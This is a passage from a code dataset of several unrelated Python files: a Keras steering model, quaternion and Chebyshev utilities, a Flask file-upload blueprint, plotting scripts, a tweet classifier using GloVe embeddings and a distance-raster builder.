BatchNormalization, Cropping2D\nfrom keras.optimizers import Adam\n\nprint('Keras Version: {}'.format(keras.__version__))\n\nmodel = Sequential()\n# Crop image\nmodel.add(Cropping2D(cropping=((50,20), (0,0)), input_shape=(160, 320, 3)))\nmodel.add(Lambda(lambda x: x/255.0 - 0.5))\n\nmodel.add(Conv2D(filters=24, kernel_size=[5,5], strides=[2,2], padding='valid'))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\nmodel.add(Dropout(rate=0.2))\n\nmodel.add(Conv2D(filters=36, kernel_size=[5,5], strides=[2,2], padding='valid'))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\nmodel.add(Dropout(rate=0.2))\n\nmodel.add(Conv2D(filters=48, kernel_size=[3,3], strides=[2,2], padding='valid'))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\nmodel.add(Dropout(rate=0.2))\n\nmodel.add(Flatten())\nmodel.add(Dense(1024, activation = 'relu'))\nmodel.add(Dense(256, activation = 'relu'))\nmodel.add(Dense(64, activation = 'relu'))\nmodel.add(Dense(1))\n\n\n#------------------------------------\n# Train model\n#------------------------------------\ncheckpointer = ModelCheckpoint(filepath='ckpt/model.hdf5', verbose=1, save_best_only=True)\nadam = Adam(lr=0.001)\n\nmodel.compile(loss='mean_squared_error', optimizer=adam)\nhist = model.fit_generator(\n generator = train_generator,\n steps_per_epoch = math.ceil(len(train_samples) / 32.0),\n validation_data = validation_generator,\n validation_steps = math.ceil(len(validation_samples) / 32.0),\n epochs = 20, \n callbacks=[checkpointer],\n)\nprint('Training History: ')\nprint(hist.history)\n\n\n#---------------------------------------\n# Evaluate on test data \n#----------------------------------------\ntest_loss = model.evaluate_generator(\n generator = test_generator, \n steps = math.ceil(len(test_samples) / 32.0),\n)\nprint('Test Loss: ')\nprint(test_loss)\n\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"420019403","text":"\nimport math\nfrom quaternions import Quaternion\n\ndef angle_axis_2_quat(angle, x, y, z) :\n q = Quaternion.from_axis_angle([x, y, z], angle / 180.0 * math.pi)\n return (q.w, q.x, q.y, q.z) \n \n\nif __name__ == \"__main__\" :\n import sys, os, subprocess\n if len(sys.argv) < 2 :\n print(\"Exit. [There is not enough argument. Usage: python quaternion2angleaxis.py path/to/work_position]\")\n exit(1)\n\n print(\"Execution of quaternion2angleaxis.py started.\")\n \n workPos = sys.argv[1]\n if os.path.isdir(workPos) :\n print(\"Detected work position:\", workPos)\n else :\n print(\"Exit. [Work position:\", workPos, \"does not exist.]\")\n exit(1)\n \n\n inputFileName = workPos + \"/input.txt\"\n\n if os.path.exists(inputFileName) :\n print(\"Detected input file: \", inputFileName)\n else :\n print(\"Exit. [Input file:\", inputFileName, \"does not exist.]\")\n exit(1)\n\n\n talkeronHome = None\n angle = None\n x = None\n y = None\n z = None\n \n with open(inputFileName, 'r') as f :\n for line in f :\n lineSplit = line.split(\"\\t\")\n if lineSplit[0].strip() == \"talkeron\" and len(lineSplit) > 1:\n talkeronHome = lineSplit[1].strip() \n if lineSplit[0].strip() == \"angle\" and len(lineSplit) > 1:\n angle = float(lineSplit[1].strip())\n if lineSplit[0].strip() == \"x\" and len(lineSplit) > 1:\n x = float(lineSplit[1].strip())\n if lineSplit[0].strip() == \"y\" and len(lineSplit) > 1:\n y = float(lineSplit[1].strip())\n if lineSplit[0].strip() == \"z\" and len(lineSplit) > 1:\n z = float(lineSplit[1].strip())\n\n if angle is not None :\n print(\"angle: \", angle)\n else :\n print(\"Exit. [Input parameter \\\"angle\\\" is missing or invalid.]\")\n exit(1)\n \n if x is not None :\n print(\"x: \", x)\n else :\n print(\"Exit. [Input parameter \\\"x\\\" is missing or invalid.]\")\n exit(1)\n\n if y is not None :\n print(\"y: \", y)\n else :\n print(\"Exit. [Input parameter \\\"y\\\" is missing or invalid.]\")\n exit(1)\n\n if z is not None :\n print(\"z: \", z)\n else :\n print(\"Exit. [Input parameter \\\"z\\\" is missing or invalid.]\")\n exit(1)\n\n resultFileName = workPos + \"/result.txt\"\n \n q = angle_axis_2_quat(angle, x, y, z) \n line = \"quaternion: (%f, %f, %f, %f) \" % (q[0], q[1], q[2], q[3])\n print(line)\n with open(resultFileName, 'w') as f :\n f.write(line)\n\n print(\"Done.\")\n","sub_path":"ext/Actions/Transform/angleaxis2quaternion.py","file_name":"angleaxis2quaternion.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"584517538","text":"import numpy as np\nimport scipy.optimize\nimport scipy.linalg\n\ndef chebnodes(m):\n \"\"\" \n Computes m Chebyshev nodes between -1 and 1.\n \"\"\"\n i = np.array(list(range(1, m+1)))\n return -np.cos(0.5 * np.pi * (2 * i - 1) / m)\n\ndef chebgrid(a, b, m):\n \"\"\" \n Computes num Chebyshev nodes on the interval [a,b].\n \"\"\"\n z = chebnodes(m)\n return (b - a) * 0.5 * (z + 1) + a \n\ndef chebconvert(x, a, b):\n \"\"\"\n Transforms nodes between [a,b] to the interval [-1,1].\n \"\"\"\n return 2. * (x - a) / (b - a) - 1\n\n\ndef chebmatrix(deg, m = None, x = None):\n \"\"\"\n Computes the m-by-(deg+1) matrix with Chebyshev basis functions of degree deg for m Chebyshev nodes.\n \"\"\"\n ## check if a second argument is provided\n assert (m != None or np.sum(x) != None), \"Please provide the number of grid points or an input vector/scalar x!\"\n \n ## check if x values are provided\n if x is None: # default: Chebyshev nodes between -1 and 1 (for interpolation/regression) \n z = chebnodes(m)\n elif isinstance(x, (list, tuple, np.ndarray)): # arbitrary vector (for approximation)\n z, m = x, len(x) \n else: # arbitrary scalar (for approximation)\n z, m = x, 1 \n\n ## define numpy array and fill second column \n T = np.ones((m, deg + 1))\n T[:,1] = z\n \n ## loop over columns in T; each column corresponds to the Chebyshev basis functions for deg col_idx\n for col_idx in range(1, deg):\n T[:,col_idx+1] = 2 * z * T[:,col_idx] - T[:,col_idx - 1]\n return T\n\ndef chebapprox(y, deg, v = None):\n \"\"\"\n Function to compute the Chebyshev coefficients using interpolation or regression\n \"\"\"\n m = len(y)\n T = chebmatrix(deg, m)\n \n if deg == m-1: # interpolation (default)\n coef = np.linalg.solve(T,y)\n else:\n coef = np.ones(deg + 1)\n for idx_deg in range(deg + 1):\n coef[idx_deg] = sum(y * T[:,idx_deg]) / sum(T[:,idx_deg]**2)\n \n return coef ","sub_path":"Lecture6_FunApprox/funapprox_cme.py","file_name":"funapprox_cme.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"481498343","text":"\n\n#calss header\nclass _POSSESS():\n\tdef __init__(self,): \n\t\tself.name = \"POSSESS\"\n\t\tself.definitions = [u'to have or own something, or to have a particular quality: ', u\"(of a wish or an idea) to take control over a person's mind, making that person behave in a very strange way: \"]\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_possess.py","file_name":"_possess.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"295148521","text":"#!/usr/bin/python3\n\nimport sys\nimport os\nimport re\n\nsrcpath = os.path.normpath(os.path.join(os.path.dirname(__file__), os.pardir, \"src\"))\nsys.path.insert(0, srcpath)\n\nif __name__ == \"__main__\":\n from catkin_lint.diagnostics import message_list\n severity = {}\n for curdir, _, files in os.walk(os.path.join(srcpath, \"catkin_lint\")):\n for fn in files:\n if fn.endswith(\".py\"):\n with open(os.path.join(curdir, fn), \"r\") as f:\n for line in f.readlines():\n m = re.search(r'info.report\\((.*?), \"(.*?)\"', line)\n if m:\n if m.group(2) not in severity:\n severity[m.group(2)] = set()\n for s in [\"ERROR\", \"WARNING\", \"NOTICE\"]:\n if s in m.group(1):\n severity[m.group(2)].add(s.lower())\n with open(os.path.join(os.path.dirname(__file__), \"docs\", \"messages.md\"), \"w\") as f:\n f.write(\"\"\"\\\n# catkin_lint diagnostic messages\n\nThis is a list of all messages which might be shown by **catkin_lint**.\nEach problem has a unique ID (such as *catkin_order_violation*),\nwhich you can use to disable certain messages, either with the command line option\n`--ignore ID`, or by adding a pragma line `#catkin_lint: ignore ID` at the beginning\nof the CMakeLists.txt file. As a third option, you can add a pragma line `#catkin_lint: ignore_once ID`\nright before the offending statement. Use this if you want to ignore a particular instance\nof a problem but still be notified if the same problem occurs someplace else. You may\nalso use `#catkin_lint: report ID` at any point to override a previous `ignore`.\n\nSince version 1.5.4, you may also customize the severity with the command line options\n`--error ID`, `--warning ID`, or `--notice ID`. You can also add the pragma line\n`#catkin_lint: skip` in any `if()`, `foreach()`, or `macro()` block, which will instruct\nthe parser to ignore all remaining commands in the block until the `else()`, `endif()`,\n`endforeach()`, or `endmacro()` statement.\n\n\"\"\")\n\n messages = {}\n for key in sorted(message_list.keys()):\n if key not in severity:\n print(\"Warning: unused message '%s'\" % key)\n continue\n short_text, long_text = message_list[key]\n long_text = long_text.replace(\"\\n\", \" \")\n long_text = long_text.replace(\"catkin_lint\", \"**catkin_lint**\")\n short_text = re.sub(r\"%\\((.*?)\\)s\", r\"\\1\", short_text)\n long_text = re.sub(r\"%\\((.*?)\\)s\", r\"\\1\", long_text)\n long_text = re.sub(r\"([a-z_]+\\(.*?\\))\", r\"\\1\", long_text)\n long_text = re.sub(r\" +\", \" \", long_text)\n long_text = long_text.strip()\n short_text = short_text.strip()\n messages[(short_text, key.lower())] = (long_text, \", \".join(sorted(severity[key], key=lambda x: {\"error\": 0, \"warning\": 1, \"notice\": 2}.get(x))))\n for msg, key in sorted(messages.keys()):\n long_text, severities = messages[(msg, key)]\n f.write(\"## %s\\n\\n\" % msg)\n f.write(\"- **ID**: %s\\n\" % key)\n f.write(\"- **Severity**: %s\\n\" % severities)\n f.write(\"- **Explanation**: %s\\n\" % long_text)\n f.write(\"\\n\")\n","sub_path":"gh-pages/mk_messages.py","file_name":"mk_messages.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"42135615","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\n\ndatosIniciales=np.genfromtxt(\"condicionesI.txt\",delimiter=\" \")\ndatosNormalInt1=np.genfromtxt(\"NormalInt1.txt\",delimiter=\" \")\ndatosNormalInt2=np.genfromtxt(\"NormalInt2.txt\",delimiter=\" \")\ndatosNormal=np.genfromtxt(\"Normalfinal.txt\",delimiter=\" \")\n\n\ndatosAbiertosInt1=np.genfromtxt(\"AbiertolInt1.txt\",delimiter=\" \")\ndatosAbiertosInt2=np.genfromtxt(\"AbiertoInt2.txt\",delimiter=\" \")\ndatosAbiertosFinal=np.genfromtxt(\"Abiertofinal.txt\",delimiter=\" \")\n\ndatosPeriodicosInt1=np.genfromtxt(\"PeridicolInt1.txt\",delimiter=\" \")\ndatosPeriodicosInt2=np.genfromtxt(\"PeriodicoInt2.txt\",delimiter=\" \")\ndatosPeriodicosFinal=np.genfromtxt(\"Periodicofinal.txt\",delimiter=\" \")\n\n\n\n\nx1=np.linspace(0.,50.,50)\ny1=np.linspace(0.,50.,50)\nX,Y=np.meshgrid(x1,y1)\n\n\n\nfig = plt.figure()\nax1 = fig.add_subplot(2,2,1, projection ='3d')\nax2= fig.add_subplot(2,2,2, projection ='3d')\nax3 = fig.add_subplot(2,2,3, projection ='3d')\nax4 = fig.add_subplot(2,2,4, projection ='3d')\nax1.set_title('Condiciones Inciales')\nax2.set_title('3000 Iteraciones')\nax3.set_title('6500 Iteraciones')\nax4.set_title('Final')\n\nsurf1=ax1.plot_surface(X,Y,datosIniciales,rstride=1,cstride=1, cmap=\"inferno\",edgecolor=\"none\")\nsurf2=ax2.plot_surface(X,Y,datosNormalInt1,rstride=1,cstride=1, cmap=\"inferno\",edgecolor=\"none\")\nsurf3=ax3.plot_surface(X,Y,datosNormalInt2,rstride=1,cstride=1, cmap=\"inferno\")\nsurf4=ax4.plot_surface(X,Y,datosNormal,rstride=1,cstride=1, cmap=\"inferno\")\n\nm = cm.ScalarMappable(cmap=\"inferno\")\nm.set_array(datosIniciales)\n\nplt.colorbar(m)\nfig.savefig(\"Normales.png\")\n\nfig = plt.figure()\nax1 = fig.add_subplot(2,2,1, projection ='3d')\nax2= fig.add_subplot(2,2,2, projection ='3d')\nax3 = fig.add_subplot(2,2,3, projection ='3d')\nax4 = fig.add_subplot(2,2,4, projection ='3d')\nax1.set_title('Condiciones Inciales')\nax2.set_title('3000 Iteraciones')\nax3.set_title('6500 Iteraciones')\nax4.set_title('Final')\n\n\nsurf1=ax1.plot_surface(X,Y,datosIniciales,rstride=1,cstride=1, cmap=\"inferno\",edgecolor=\"none\")\nsurf2=ax2.plot_surface(X,Y,datosAbiertosInt1,rstride=1,cstride=1, cmap=\"inferno\",edgecolor=\"none\")\nsurf3=ax3.plot_surface(X,Y,datosAbiertosInt2,rstride=1,cstride=1, cmap=\"inferno\")\nsurf4=ax4.plot_surface(X,Y,datosAbiertosFinal,rstride=1,cstride=1, cmap=\"inferno\")\n\nm = cm.ScalarMappable(cmap=\"inferno\")\nm.set_array(datosIniciales)\nplt.colorbar(m)\nfig.savefig(\"Abiertas.png\")\n\nfig = plt.figure()\nax1 = fig.add_subplot(2,2,1, projection ='3d')\nax2= fig.add_subplot(2,2,2, projection ='3d')\nax3 = fig.add_subplot(2,2,3, projection ='3d')\nax4 = fig.add_subplot(2,2,4, projection ='3d')\nax1.set_title('Condiciones Inciales')\nax2.set_title('3000 Iteraciones')\nax3.set_title('6500 Iteraciones')\nax4.set_title('Final')\n\n\nsurf1=ax1.plot_surface(X,Y,datosIniciales,rstride=1,cstride=1, cmap=\"inferno\",edgecolor=\"none\")\nsurf2=ax2.plot_surface(X,Y,datosPeriodicosInt1,rstride=1,cstride=1, cmap=\"inferno\",edgecolor=\"none\")\nsurf3=ax3.plot_surface(X,Y,datosPeriodicosInt2,rstride=1,cstride=1, cmap=\"inferno\")\nsurf4=ax4.plot_surface(X,Y,datosPeriodicosFinal,rstride=1,cstride=1, cmap=\"inferno\")\n\nm = cm.ScalarMappable(cmap=\"inferno\")\nm.set_array(datosIniciales)\nplt.colorbar(m)\nfig.savefig(\"Periodicas.png\")\n\n\n\n\n\n\ndatos=np.genfromtxt(\"45.txt\",delimiter=\" \")\n\nplt.figure()\nplt.plot(datos[:2000,0],datos[:2000,1],label=\"45\")\nplt.legend()\nplt.ylim(0,)\nplt.title(\"45 grados\")\n\nplt.savefig(\"45.png\")\nplt.figure()\nplt.plot(datos[2000:4000,0],datos[2000:4000,1],c=\"b\",label=\"10\")\n\nplt.plot(datos[4000:6000,0],datos[4000:6000,1],c=\"r\",label=\"20\")\nplt.plot(datos[6000:8000,0],datos[6000:8000,1],c=\"g\",label=\"30\")\nplt.plot(datos[8000:10000,0],datos[8000:10000,1],c=\"orange\",label=\"40\")\nplt.plot(datos[10000:12000,0],datos[10000:12000,1],c=\"yellow\",label=\"50\")\nplt.plot(datos[12000:14000,0],datos[12000:14000,1],c=\"brown\",label=\"60\")\nplt.plot(datos[14000:16000,0],datos[14000:16000,1],c=\"gray\",label=\"70\")\nplt.title(\"Varicion de grados\")\nplt.xlim(0.)\nplt.ylim(0,)\nplt.legend()\nplt.savefig(\"variosAngulos.png\")\n\n\n\n\n\n\n\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":4077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"647354474","text":"a=[1,2,3,4,5,23,45,1,2,3,5,5]\n\nfor i in a:\n print(i)\n\nb=int(input(\"Enter the number of which 1 occurance to remove\"))\nc=0\nfor i in a:\n if i==b:\n break\n c=c+1 \n\n\ndel a[c]\nprint (\"list after removal of specified number \")\ni=0\nfor i in a:\n print(i)","sub_path":"TM02/List/Handon_8.py","file_name":"Handon_8.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"356696743","text":"# -*- coding=utf-8 -*-\nimport os\nfrom flask import Blueprint, request, render_template\nfrom flask import current_app\nimport json\n\nupload_app = Blueprint(\"upload\", __name__)\n\n@upload_app.route(\"/\", methods=['get', 'post'])\ndef upload():\n if request.method == \"POST\":\n file_storage_list = request.files.getlist(\"file\")\n message = {\"result\":\"\",\"error\":\"\", \"filepath_list\":[]}\n for file_storage in file_storage_list:\n # 获得上传数据长度\n if request.content_length > 300000*1000:\n message['result'] = \"fail\"\n message['error'] = \"上传文件太大\"\n return json.dumps(message)\n # 任何时候,后端都不要相信前端\n # 的数据检测结果,比如上传类型限制,所有必要的检查都须放在\n # 后端进行检测\n if file_storage.content_type not in \\\n current_app.config['ALLOW_UPLOAD_TYPE']:\n message['result'] = \"fail\"\n message['error'] = \"上传文件类型不对\"\n return json.dumps(message)\n\n # 使用新文件名保存\n file_path= os.path.join(get_dir(),\n create_filename(file_storage.filename))\n try:\n file_storage.save(file_path)\n except Exception as e:\n message = {\"result\":\"fail\",\"error\":str(e)}\n return json.dumps(message)\n # [1:]将.static/相对路径转为/static绝对路径\n message['filepath_list'].append(file_path[1:])\n message['result'] = \"success\"\n return json.dumps(message)\n\n return render_template(\"upload/jquery_upload.html\")\n\n@upload_app.route(\"/ckeditor\", methods=['post'])\ndef ckeditor_upload():\n if request.method == \"POST\":\n file_storage = request.files.get(\"upload\")\n message = {\n \"uploaded\": \"0\",\n \"fileName\": \"\",\n \"url\" : \"\",\n \"error\" : {\n \"message\": \"\"\n }\n }\n\n # 获得上传数据长度\n if request.content_length > 300*1000:\n message['uploaded'] = \"0\"\n message['error']['message']= \"上传文件太大\"\n return json.dumps(message)\n # 任何时候,后端都不要相信前端\n # 的数据检测结果,比如上传类型限制,所有必要的检查都须放在\n # 后端进行检测\n if file_storage.content_type not in \\\n current_app.config['ALLOW_UPLOAD_TYPE']:\n message['uploaded'] = \"0\"\n message['error']['message'] = \"上传文件类型不对\"\n return json.dumps(message)\n\n\n file_path= os.path.join(get_dir(),\n create_filename(file_storage.filename))\n try:\n file_storage.save(file_path)\n except Exception as e:\n message = {\"uploaded\":\"0\",\"error\":str(e)}\n return json.dumps(message)\n\n message['fileName'] = file_storage.filename\n # [1:]将.static/相对路径转为/static绝对路径\n message['url'] = file_path[1:]\n message['uploaded'] = \"1\"\n return json.dumps(message)\n\n\n@upload_app.route(\"/ckeditor/browser\", methods=['get'])\ndef ckeditor_browser():\n images = []\n for dirpath, dirnames, filenames in os.walk(\"./static/uploads\"):\n for file in filenames:\n images.append(os.path.join(dirpath[1:], file))\n return render_template(\"upload/browser.html\", images=images)\n\n\ndef get_dir():\n '''\n 生成文件存放路径\n :return: 存放文件路径\n '''\n from datetime import date\n # 上传文件存放路径\n base_path = \"./static/uploads/\"\n # 根据上传的日期存放\n d = date.today()\n # 生成存储路径\n path = os.path.join(base_path, str(d.year), str(d.month))\n # try:\n # os.makedirs(path)\n # except:\n # pass\n if not os.path.exists(path):\n os.makedirs(path)\n return path\n\ndef create_filename(filename):\n '''\n 生成随机文件名\n :param filename:\n :return:\n '''\n import uuid\n ext = os.path.splitext(filename)[1]\n new_file_name = str(uuid.uuid4())+ext\n return new_file_name\n","sub_path":"14.第二次代码重构/views/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":4277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"58216743","text":"import random\nimport string\nimport unicodedata\n\nfrom flask import request, current_app\n\nfrom flaskr.lib.conf.const import Const\n\n\nclass StrUtil:\n def make_random_str(len):\n return ''.join(random.choices(string.ascii_letters + string.digits + '/', k=len))\n\n def get_safe_config(app, param_name):\n if not param_name:\n return ''\n\n if param_name in app.config:\n return app.config[param_name]\n\n return ''\n\n def get_safe_string(param_value):\n if not param_value:\n return ''\n\n return param_value\n\n def get_safe_edit_mode(session_name, session):\n if not session_name:\n return False\n\n if session_name in session:\n return session[session_name]\n\n return False\n\n def truncate(value, num_bytes):\n while StrUtil.lenb(value) > num_bytes:\n value = value[:-1]\n return value\n\n def lenb(message):\n # 文字列長カウント用の変数を定義\n text_length = 0\n # 文章中の文字数分ループを回す\n for i in message:\n c = unicodedata.east_asian_width(i)\n # 半角\n if c == 'H' or c == 'Na':\n text_length = text_length + 1\n # 全角\n elif c == 'F' or c == 'A' or c == 'W':\n text_length = text_length + 3\n # 半角\n else:\n text_length = text_length + 1\n return text_length\n\n @staticmethod\n def get_ip_addr():\n remote_addr = StrUtil.get_safe_config(current_app, 'LOCAL_REMOTE_ADDR')\n if not remote_addr:\n # define your own set\n trusted_proxies = {'127.0.0.1'}\n route = request.access_route + [request.remote_addr]\n remote_addr = next((addr for addr in reversed(route)\n if addr not in trusted_proxies), request.remote_addr)\n StrUtil.print_debug(\"======================remote_addr:{}=========================\".format(remote_addr))\n return remote_addr\n\n def print_debug(msg):\n is_debug_mode = StrUtil.get_safe_config(current_app, 'DEBUG')\n if is_debug_mode:\n current_app.logger.debug(Const.DEBUG_MSG_FORMAT.format(msg))\n\n def print_error(err_msg, exc_info=True):\n current_app.logger.error(Const.ERROR_MSG_FORMAT.format(err_msg), exc_info=exc_info)\n","sub_path":"svcdb/flaskr/lib/svcdb_lib/str_util.py","file_name":"str_util.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"400860098","text":"import pandas as pd\nimport numpy as np\nimport re\nimport seaborn as sns\nfrom matplotlib import pyplot as plt\nimport warnings\nfrom wordcloud import STOPWORDS\nimport operator\n\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\npd.set_option('display.max_columns', 10)\n\ntrain = pd.read_csv('train.csv', index_col='id')\ntest = pd.read_csv('test.csv', index_col='id')\nfor df in [train, test]:\n \n df.drop(columns=['keyword', 'location'], inplace=True)\n \n text=\"@Kiwi_Karyn Check out what's in my parking lot!! He said that until last year it was an ambulance in St Johns. http://t.co/hPvOdUD7iP\"\n text1=\"Check out what's in my parking lot He said that until last year it was an ambulance in St Johns\"\n \n #number of characters\n df['NumChar'] = df['text'].apply(len)\n \n #to lower\n df['text'] = df['text'].apply(lambda x: x.lower())\n \n #count links\n df['Links'] = df['text'].apply(lambda x: len(re.findall(r\"http://\", x)))\n \n #del links\n df['text'] = df['text'].apply(lambda x: re.sub(r\"https*://\\S+\",\"\", x))\n \n #count @\n df['Mentions'] = df['text'].apply(lambda x: len(re.findall(r\"@\", x)))\n \n #count #\n df['Hashtags'] = df['text'].apply(lambda x: len(re.findall(r\"#\", x)))\n \n #del @#\n df['text'] = df['text'].apply(lambda x: re.sub(r\"[@#]\",\"\", x))\n \n #count punctuation\n df['Punct'] = df['text'].apply(lambda x: len(re.findall(r\"[!#$%&'()*+,-./:;<=>?@[\\]^_`{|}~]\", x)))\n \n #remove punctuation\n df['text'] = df['text'].apply(lambda x: re.sub(r\"[!#$%&()*+,-./:;<=>?@[\\]^_{|}~]\",\" \", x))\n df['text'] = df['text'].apply(lambda x: re.sub(r\"' | '|^'|'$\", \" \", x))\n \n #del lots of spaces\n df['text'] = df['text'].apply(lambda x: re.sub(r\"\\s{2,}\",\" \", x))\n \n #word count\n df['WordCount'] = df['text'].apply(lambda x: len(re.split(r\" \", x)))\n \n #average word lenght\n df['WordLenght'] = df['text'].apply(lambda x: round(np.mean([len(w) for w in str(x).split()]), 1))\n \n #number of stopwords\n df['StopWordsCount'] = df['text'].apply(lambda x: len([w for w in str(x).lower().split() if w in STOPWORDS]))\n \n text2=\"Big Top Burning The True Story Of An Arsonist A Missing Girl ‰Û \"\n \n #delete special characters\n df['text'] = df['text'].apply(lambda x: re.sub(r\"[^a-z ']\", '', x))\n\n #expand abbreviations\n df['text'] = df['text'].apply(lambda x: re.sub(r\"'s\", ' is', x))\n df['text'] = df['text'].apply(lambda x: re.sub(r\"'ve\", ' have', x))\n df['text'] = df['text'].apply(lambda x: re.sub(r\"'m\", ' am', x))\n df['text'] = df['text'].apply(lambda x: re.sub(r\"n't\", 'n not', x))\n df['text'] = df['text'].apply(lambda x: re.sub(r\"'re\", ' are', x))\n df['text'] = df['text'].apply(lambda x: re.sub(r\"'d\", ' would', x))\n df['text'] = df['text'].apply(lambda x: re.sub(r\"'ll\", ' will', x))\n\n\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\n\ntokenizer = Tokenizer()\ntokenizer.fit_on_texts(train['text'])\n\nMAXLEN=100\n\ntrain_sequences = tokenizer.texts_to_sequences(train['text'])\ntrain_data = pad_sequences(train_sequences, maxlen=MAXLEN)\n\ntest_sequences = tokenizer.texts_to_sequences(test['text'])\ntest_data = pad_sequences(test_sequences, maxlen=100)\n\nword_index=tokenizer.word_index\nprint('Number of unique words:',len(word_index))\n\nembeddings_index = dict()\n\nGLOVE_DIM=200\nf = open('embeddings/glove.twitter.27B.200d.txt', encoding=\"utf8\")\n\nfor line in f:\n values = line.split()\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\nf.close()\n\nnum_words=len(word_index)+1\n\n\nembedding_matrix = np.zeros((num_words, GLOVE_DIM))\n\nfor word, index in tokenizer.word_index.items():\n if index > num_words - 1:\n break\n else:\n embedding_vector = embeddings_index.get(word)\n if embedding_vector is not None:\n embedding_matrix[index] = embedding_vector\n \n \ndef build_vocab(X):\n \n tweets = X.apply(lambda s: s.split()).values \n vocab = {}\n for tweet in tweets:\n for word in tweet:\n try:\n vocab[word] += 1\n except KeyError:\n vocab[word] = 1 \n return vocab\n\ndef check_embeddings_coverage(X, embeddings):\n \n vocab = build_vocab(X) \n covered = {}\n oov = {} \n n_covered = 0\n n_oov = 0\n for word in vocab:\n try:\n covered[word] = embeddings[word]\n n_covered += vocab[word]\n except:\n oov[word] = vocab[word]\n n_oov += vocab[word]\n vocab_coverage = len(covered) / len(vocab)\n text_coverage = (n_covered / (n_covered + n_oov))\n sorted_oov = sorted(oov.items(), key=operator.itemgetter(1))[::-1]\n return sorted_oov, vocab_coverage, text_coverage\n\n\ntrain_glove_oov, train_glove_vocab_coverage, train_glove_text_coverage = check_embeddings_coverage(train['text'], embeddings_index)\ntest_glove_oov, test_glove_vocab_coverage,test_glove_text_coverage = check_embeddings_coverage(test['text'], embeddings_index)\nprint('GloVe Embeddings cover {:.2%} of vocabulary and {:.2%} of text in Training Set'.format(train_glove_vocab_coverage, train_glove_text_coverage))\nprint('GloVe Embeddings cover {:.2%} of vocabulary and {:.2%} of text in Test Set'.format(test_glove_vocab_coverage, test_glove_text_coverage))\n\n#print(test_glove_oov)\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM, Conv1D, MaxPooling1D, SpatialDropout1D\nfrom keras.layers import Dropout, Bidirectional, Activation\nfrom keras.layers import GlobalMaxPooling1D, GlobalAveragePooling1D\nfrom keras.layers.embeddings import Embedding\n\nmodel = Sequential()\nmodel.add(Embedding(num_words, GLOVE_DIM, input_length=100, weights=[embedding_matrix],\n trainable=False))\nmodel.add(Dropout(0.2))\nmodel.add(Conv1D(64, 5, activation='relu'))\nmodel.add(MaxPooling1D(pool_size=4))\nmodel.add(LSTM(300))\nmodel.add(Dense(1, activation='sigmoid'))\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\nmodel.summary()\nmodel.fit(train_data, train['target'], validation_split=0.25, epochs=5)\nmodel_loss = pd.DataFrame(model.history.history)\nmodel_loss[['accuracy','val_accuracy']].plot()\n\npredictions= model.predict_classes(test_data)\n\n#print(predictions)\n\nsubmission = pd.read_csv('sample_submission.csv')\nsubmission[\"target\"] = predictions\nsubmission.to_csv(\"submission_glove.csv\", index=False)\n","sub_path":"keras.py","file_name":"keras.py","file_ext":"py","file_size_in_byte":6512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"502613204","text":"\n\n\nimport os\n\nfrom distancerasters import build_distance_array, rasterize, export_raster\n\n\n# -----------------------------------------------------------------------------\n\nfrom affine import Affine\n# import numpy as np\nimport fiona\n\npixel_size = 0.0002695\n\ncanal_path = os.path.expanduser(\n \"~/git/afghanistan_gie/canal_data/canal_lines.geojson\")\n\nwith fiona.open(canal_path) as canal_src:\n bounds = canal_src.bounds\n\n\nrv_array, affine = rasterize(canal_path, pixel_size=pixel_size, bounds=bounds)\n\n\nbinary_raster_path = \"/sciclone/aiddata10/REU/data/projects/afghanistan_gie/distance_to_canals/binary_canals.tif\"\n\nexport_raster(rv_array, affine, binary_raster_path)\n\n# import tarfile\n\n# def make_tarfile(dst, src):\n# with tarfile.open(dst, \"w:gz\") as tar:\n# tar.add(src, arcname=os.path.basename(src))\n\n\n# make_tarfile(dst=binary_raster_path + \".tar.gz\" , src=binary_raster_path)\n\n# -----------------------------------------------------------------------------\n\n\ndistance_raster_path = \"/sciclone/aiddata10/REU/data/projects/afghanistan_gie/distance_to_canals/distance_canals.tif\"\n\ndef raster_conditional(rarray):\n return (rarray == 1)\n\ndist = build_distance_array(rv_array, affine=affine,\n output=distance_raster_path,\n conditional=raster_conditional)\n\n\n# make_tarfile(dst=distance_raster_path + \".tar.gz\" , 